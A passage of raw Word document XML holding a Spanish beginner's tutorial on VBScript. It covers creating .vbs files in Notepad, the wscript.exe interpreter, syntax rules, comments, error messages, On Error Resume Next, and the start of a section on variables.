        <w:t>doble clic encima se ejecuta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y haciendo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>clic con el botón derecho y eligiendo editar, se modifica</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Nombremos los pasos que hay que seguir para crear un script en este lenguaje:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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brir el Bloc de Notas (los scripts son archivos de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>texto sin formato</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Escribir dentro el código (en este caso, dejémoslo en blanco).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Hacer clic en Archivo, Guardar como...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Seleccionar la ruta y escribir como nombre de archivo "loquequieras.vbs" (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>comillas incluidas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>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Una v</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ez guardado, podéis comprobar có</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">mo, ciertamente, si hacemos doble clic no pasa nada (se ejecuta, pero como no hay nada escrito, no pasa nada) y si hacemos clic con el botón derecho y elegimos editar, nos aparecerá en blanco (si no funciona, probad </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>abrirlo con el comando Abrir del Bloc de Notas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</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Para asegurarte de que se ha creado correctamente, debes fijarte en el titulo que muestra el Bloc de Notas, cuando lo abres para editar, que se debe corresponder al siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="96"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1761490" cy="353060"/>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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1761490" cy="35306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s un error tener un nombre como "nombre.vbs.txt". Es absolutamente necesario que acabe en ".vbs" para que se ejecute correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="93" w:right="165"/>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último, antes de pasar a ver como se edita un Script, mencionar lo que ocurre cuando haces doble clic en un archivo acabado en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>".vbs" porque a veces suele ser muy útil saberlo. Esto se resume en el siguiente esquema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="348" w:line="238" w:lineRule="auto"/>
        <w:ind w:left="28" w:right="3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Se ejecuta Wscript.exe --&gt; Wscript.exe lee el script --&gt; Wscript.exe ejecuta el script --&gt; Se cierra Wscript.exe</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Hay un archivo en la carpeta Windows de tu PC, que se llama "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Wscript.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">", este es el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>intérprete de VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. En sus versiones más antiguas podía ser eliminado para impedir la ejecución de los ".vbs", pero ahora está bastante protegido. Pero bueno, saber que si alguna vez se te "cuelga" algún script, solo hay que darle a Crtl+Alt+Supr y en la pestaña de procesos, cerrar el que tiene ese nombre.</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ara editar un Script, como se ha explicado antes, se puede hacer con el bloc de notas, aunque existen programas especializados en edición de este tipo de lenguaje que facilitan mucho las cosas. Pese a esto, lo edites como lo edites, hay una serie de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">normas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y cosas que hay que tener en cuenta a la hora de escribir cualquier cosa. Estas son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="164" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El script se ejecuta de forma secuencial, es decir, que la acción escrita en la primera línea, se ejecuta antes que la que hay en la segunda línea. La que haya en la segunda línea, antes que la que hay en la tercera, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="164"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xisten comentarios (aclaraciones) escritas fuera de la regla del lenguaje. Estos van precedidos de una comilla simple </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>( '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), que se escribe pulsando la tecla de al lado del 0, o de la palabra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rem</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (esta solo se puede poner al principio de una línea, no por la mitad...). Es decir, si en una línea nos encontramos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>acción 'Esto sirve para...</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la aclaración (todo lo que va detrás de la comilla) no se ejecuta. Es decir, son simples aclaraciones, ignoradas en la ejecución del programa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="164" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Solo se puede escribir una orden por línea. Cada línea nueva indica el fin de una orden y el comienzo de otra. No se puede partir una orden en dos líneas ni colocar más de una en una misma línea. (Existen excepciones que se comentarán mas adelante...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="164" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Si hay alguna orden errónea, o algún error de algún tipo, se mostrará un mensaje con el contenido de dicho error, y en la línea en la que ocurre (la información que muestra dicho mensaje no siempre es fiable, pero por regla general, le haremos cas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A la hora de seguir este tutorial, encontrareis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuadros</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como el siguiente, que muestran ejemplos de lo que se explica:</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 xml:space="preserve">" Mensaje ",0," Titulo " 'Crea un cuadro de mensaje </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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s cuadros deben ser </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>copiados a vuestro script</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> borrando todo lo demás o en una línea nueva vacía (recuerda las normas que se acaban de explicar), y pueden ser modificados siguiendo las instrucciones que se indican en el tutorial. Concretamente, en este cuadro de ejemplo, si lo copias, veréis el resultado que provoca al ejecutarlo, aunque lo que significa y como modificarlo, ya será explicado mas adelante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="312"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5124450" cy="1771650"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5124450" cy="1771650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="167"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En este caso, la imagen muestra como se copia, y ved que no tiene mas complicación. Fijaros que el código, contiene una instrucción en una línea y además posee un comentario, que no influye en nada ya que es simplemente informativ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Si, por algún motivo incumplimos alguno de los puntos anteriores, se nos mostrara el mensaje de error correspondiente.</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Cuando algo en nuestro script es incorrecto, se nos muestra un mensaje de error advirtiéndonos del mismo. Este mensaje tiene la apariencia mostrada a continuación:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1850"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3171190" cy="1638300"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3171190" cy="163830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Podemos ver que en el mensaje de error hay varios datos, algunos como el código o el origen no nos importan, pero otros nos pueden ser útiles. Estos son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="159" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Secuencia de comandos: Hace referencia al archivo que ha producido el error. En este caso de ejemplo, el error habría sido dado por un archivo que está en la carpeta VBScript en el disco duro D, y que se llama script.vbs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="159" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Línea: Indica la línea en la que se ha producido el error indicado. Esto es muy útil ya que reduce la búsqueda a una zona muy pequeña del script, aunque no siempre es fiable, orienta mas o menos donde puede haber sido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="159"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rror: Los errores suelen ser básicamente de dos tipos: Errores de sintaxis y Errores en el tiempo de ejecución. Los errores de sintaxis se producen cuando hay algo mal escrito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se parte una orden en dos líneas...) a lo largo del script. Los errores en el tiempo de ejecución se producen cuando se quieren realizar operaciones con resultado erróneo (dividir entre cero, raíces de números negativos, tomar valores de texto como números...); son errores que se producen, no porque el script esté mal diseñado, sino porque se introducen mal los datos.</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ásicamente, cuando hay algún error, si es de sintaxis, se ve a la línea indicada y se comprueba si todo está escrito correctamente. Si es en el tiempo de ejecución hay que comprobar si se ha intentado hacer alguna operación inválida. Por otro lado, en el apartado Error nos pueden aparecer mensajes más explícitos que estos dos, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo, "constante de cadena sin terminar" o "división por cero". Dichos mensajes nos dan más información aún sobre lo que puede haber ocurrido en nuestro script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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otro lado, puede que alguna vez sepas que se produce algún error, pero quieras que pese a esto el script continúe su ejecución, o bien tengas un script terminado y correctamente escrito, pero quieres protegerlo contra posibles errores en el tiempo de ejecución; para ello se puede utilizar una función cuyo cometido es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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si en una línea se produce un error, salta a la siguiente</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sin mostrar ningún error ni nada por el estilo. Esta función es:</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On Error Resume Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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en una línea escribimos esto, a partir de esa (todas las que tenga debajo) aunque se produzcan errores, ni se mostrarán ni se parará la ejecución del script; por eso, lo normal es ponerlo en la primera línea. De hecho, si copiáis esto y debajo escribís cualquier cosa, no mostrará ningún error, mientras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borráis esta línea, si lo mostrará. Si queremos que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vuelva a mostrar errores</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> unas líneas mas abajo, lo único que hay que hacer es colocar esta otra función:</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On Error Go To 0</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a partir de esa línea se volverán a mostrar mensajes de error con normalidad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="896"/>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buscáis por Internet o en ayudas los posibles errores veréis que la mayoría vienen en tres columnas. Una que indica el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>numero de error</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no es mas que un numero identificativo), el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>mensaje de error</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se muestra, y la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>descripción del mismo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="134"/>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Las Variables</w:t>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Esta parte es, sin duda, la más importante en la programación no solo de VBScript, sino de cualquier lenguaje de programación de cualquier tipo. Podemos comparar una variable a una caja a la que la etiquetamos con un nombre y guardamos y sacamos cosas de ella. También podemos compararla con la "x" de las funciones matemáticas a la que le podemos dar cualquier valor. En cualquier caso, una variable tiene un nombre identificativo y un contenido. El nombre identificativo será siempre el mismo y no variará, en cambio, el contenido puede variar continuamente.</w:t>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xisten dos métodos para usar las variables en VBScript, uno mas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"libre"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y otro mas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>similar a los demás lenguajes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para que no cojais malas costumbres, dejaremos de lado el libre y os enseñaré el más común. Este se activa colocando en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
